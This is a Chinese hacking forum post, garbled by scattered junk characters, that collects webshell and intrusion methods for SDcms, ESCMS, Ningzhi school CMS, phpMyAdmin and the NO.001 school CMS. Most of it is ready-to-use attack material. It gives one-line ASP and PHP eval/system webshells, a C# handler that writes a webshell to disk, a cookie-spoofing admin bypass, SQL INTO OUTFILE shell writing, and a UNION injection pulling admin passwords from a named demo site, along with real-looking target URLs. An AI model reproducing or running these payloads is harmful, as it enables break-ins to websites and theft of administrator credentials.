( W* g' s' v1 i1 C# ~1 YUpload a new file:<br>
+ y8 ~ c& B8 V1 V" A<input type="file" name="NewFile" size="50"><br>) [+ m# E) k' B2 c# Z
<input id="btnUpload" type="submit" value="Upload">
4 H' \# ~: y5 \5 W, R</form>
8 ]; q$ V e2 K7 C2 h& P+ N$ |-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; }: y1 J/ F, Q& U b2 A
7 V- i& d2 s0 P: M; w4 `SDcms 后台拿webshell, |. x* @1 f3 ~; Q4 y. @# _
j5 P+ @ \/ o6 \- L1 | J9 j& E/ Z2 }
第一种方法:: X; W- A# R1 X; k# Z D
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
4 O5 b3 f8 E, O/ u5 p% o把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx: @' \5 ]6 w- y
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。( t% F3 n3 Y+ N6 {6 a7 A( b5 e7 \
第二种方法:3 a& I+ J1 E" k' ]' R9 R
进入后台-->系统管理-->系统设置-->系统设置->上传设置;9 S: L: `7 M* p! D. ]4 C
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
: j3 N5 q. y/ k6 U3 L/ b) {5 S第三种方法:
! L" w: Z2 K' X) i进入后台-->界面管理-->模板文件管理-->创建文件. j2 v: v7 O3 K
文件名写入getshell.ashx
5 |5 {, U% [+ g2 ~5 k内容写入下面内容:9 A4 H1 Z3 j: n7 X* z- X
/====================复制下面的=========================/
* Y; f' D1 `9 b r' z<%@ WebHandler Language="C#" Class="Handler" %>3 h8 j) E4 n+ y# }$ U/ G2 e( P, S
using System;. X1 b$ q( q! N9 I$ c
using System.Web;4 A7 U9 B/ k9 o' Y/ u+ d4 T
using System.IO;" z ~% y7 l& a: r8 O& [+ G( w- E. B, R% k
public class Handler : IHttpHandler {9 [) ?+ n( V, j$ [( k; ^) a4 _1 W
public void ProcessRequest (HttpContext context) {
" ^9 P% Q- Y' @1 h" l bcontext.Response.ContentType = "text/plain";9 z" Y: ]& C. n0 [
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
1 R _: d1 }/ `file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
: ]% T& g, P l# g7 A3 r& V, Dfile1.Flush();
0 T" @4 [/ A J$ k% x) ffile1.Close();
4 n( W2 N0 X1 L* D) \. Y} [! U& P( h1 g$ y7 c0 J
public bool IsReusable {5 S) M1 e3 i* o$ C
get {
& a. ]# R+ O+ x5 w) ^" x4 preturn false; m. G \5 I1 i2 H4 s
}
* `; l$ {% c- n& R}
( s' K; @! ^( k3 z, O- p! d4 q} x7 w/ z8 N' Y) p7 m: M
/=============================================/9 J w' f( A) b. P" V
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
6 B: _! u0 ?) ?; q& c4 x3 F1 R会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接: W$ b, e& r- q- O# g. `* S
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 H ?( [+ N q% h3 e5 K) O# L! _! T
! X' {. v! @5 e: ]/ ~/ IESCMS网站管理系统0day
! M' [8 X B9 M+ C- v* M+ ~) x+ M! Y2 J# X8 b! d
后台登陆验证是通过admin/check.asp实现的
7 f1 z# O2 ^: c% v! G1 [' n% ^+ p$ c( |) H% U
首先我们打开http://target.com/admin/es_index.html
+ L F' p' [6 t2 q+ K然后在COOKIE结尾加上1 j' T0 f$ W+ I( L4 Z& W
; ESCMS$_SP2=ES_admin=st0p;8 J" }% f9 h$ b* X9 U; A9 Y& u
修改,然后刷新
& a( ~' [7 c; F- |; H$ c进后台了嘎..3 q1 z7 j' |) D3 D* f' ~ t
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
! D7 {, j% A x: J- b! k. F. O
/ [1 m1 s; Y# f# G, r, }; w利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.) S+ J) S6 L3 b' Q c9 X2 x2 d
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
0 C$ V; P9 U2 s4 P& q g2 a存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败.. }2 x- z) D# O( Q# S2 G
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了' h4 \2 g1 P. Z: B9 _* g1 k% u
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ d- P1 ~- K% E q" U, v. H& }' w0 i" O4 `) T! K
宁志网站管理系统后台无验证漏洞及修复. m, G, K! p( c2 F# @% i
2 N; a* a1 U" C6 @3 {7 j: p4 o
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
* ^2 M. n- [8 I! i0 v' v- N+ I官方网站:www.ningzhi.net
& R9 Q: }9 ^! m/ i5 k) J) s学校网站管理系统 V.2011版本 $ B8 v8 {0 q7 S3 K& @8 }: _6 W f
http://down.chinaz.com/soft/29943.htm
/ H4 m: ]- c9 J7 c; d7 D其它版本(如:政府版等),自行下载.- O n. g6 l# [! L8 j) M9 p
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
3 D- `* \* ^- w# r* Z$ D, n2 d5 alogin.asp代码如下:
' h" f6 C- e0 |+ Q4 k<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> ' i' R# Y8 _: g* S
manage.asp代码我就不帖出来了.反正也没验证.
1 A& W% A3 H% Z0 H! _+ U只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!: r; ~4 t0 ^' X
漏洞利用:4 ?1 x( x8 C: e; B, w; N7 `
直接访问http://www.0855.tv/admin/manage.asp
% Q/ e; C" z, \8 m6 l. O数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web57 d! G1 m# Q) j4 W9 g# b
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------& n" b; U: b- a7 t, X
, H6 Y/ p7 l) ? \8 k3 T" n) ~phpmyadmin拿shell的四种方法总结及修复
1 h. u! E% [+ E# S5 U3 C, T& {- Z- n
' j" ^& P8 w7 {. l方法一:
) C; q4 |6 D S; wCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );6 V% Y( W+ Q2 X4 {9 P; Z
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');4 D5 X% D7 G/ Z4 o/ A3 o2 W s& t9 S& R
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';* L' ^1 N8 L7 C/ o
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
+ I$ n' Q: o4 T. h. I 一句话连接密码:7on
1 W, ^. y2 @- J方法二:
' Q* \( \( o+ T读取文件内容: select load_file('E:/xamp/www/s.php');
* W$ p. m7 E5 {- N- r4 s/ A2 j) `写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
# t# z4 I5 Y4 q: h7 u4 @cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php' n& }1 G+ z3 N6 V8 `' F# b* i
方法三:
, o5 M+ h0 `/ p& y8 |JhackJ版本 PHPmyadmin拿shell
0 z9 Q# g. |. J: ]3 qCreate TABLE study (cmd text NOT NULL);/ g- }7 d; }8 q6 Z! W
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
8 p4 ?6 X$ q2 Eselect cmd from study into outfile 'E:/wamp/www/7.php';/ X: h m- Y5 j2 n4 q
Drop TABLE IF EXISTS study;8 x# P+ _+ E; w
<?php eval($_POST[cmd])?>9 o$ |0 f0 v( L0 a3 ]( U# X
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
+ W M& v, R) F" H: |INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
0 u7 B; }; p- o; x8 P1 w$ i4 K# f0 MSELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
& w& `& o5 }: T' }8 c1 d' p; q, Q' jDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
0 _6 e3 l( S' Z0 t方法四:
( g$ i. w5 A7 ~$ ?select load_file('E:/xamp/www/study.php');+ d1 n# W$ P9 o; K
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
3 b D# C6 D0 D然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
1 l4 y2 f2 {7 m-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 X1 g/ M2 _+ m4 @8 |8 n. u" l+ w, F
8 \) S3 c% s' B: C; O% iNO.001中学网站管理系统 Build 110628 注入漏洞
# g. C' {% M3 y, q5 W0 `9 k
+ O) {2 }8 |4 ~8 j# RNO.001中学网站管理系统功能模块:
g. {$ H, A8 }" c6 ]" ?1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
, \# e' {( Y1 |2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息$ n3 K0 e: R$ V( R8 z1 _
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息/ o5 ?$ D' _ ?( F* l2 X& C M
4.视频图片管理:一级分类,动态添加视频或者图片等信息( d) o9 \" }/ i# ?. w
5.留言管理:对留言,修改,删除、回复等管理5 A0 {5 M% j3 o9 s" k0 }( l! x
6.校友频道:包括校友资料excel导出、管理等功能
* l8 W. @! d3 G6 o' J7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
( y* h9 }) ~9 N! e默认后台:admin/login.asp9 g! j: g8 C' r7 ?6 P& ~' y
官方演示:http://demo.001cms.net( q' l" z) t" x7 X8 j) L( x6 g
源码下载地址:http://down.chinaz.com/soft/30187.htm
7 f1 C- ?1 y% ~8 _* [; |EXP:
3 j1 B5 n$ M C, }% Runion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
* D0 ?2 }; W8 v5 w5 n2 j测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
$ e6 \9 _+ r5 A$ ?( V. ~3 E4 Dgetshell:后台有备份,你懂的$ [ G. B! N+ z* F& k
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
`% L i F3 D9 O------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
匿名
发表于 2017-10-28 08:21:04
发表于 2012-9-13 16:58:38
收藏
支持
反对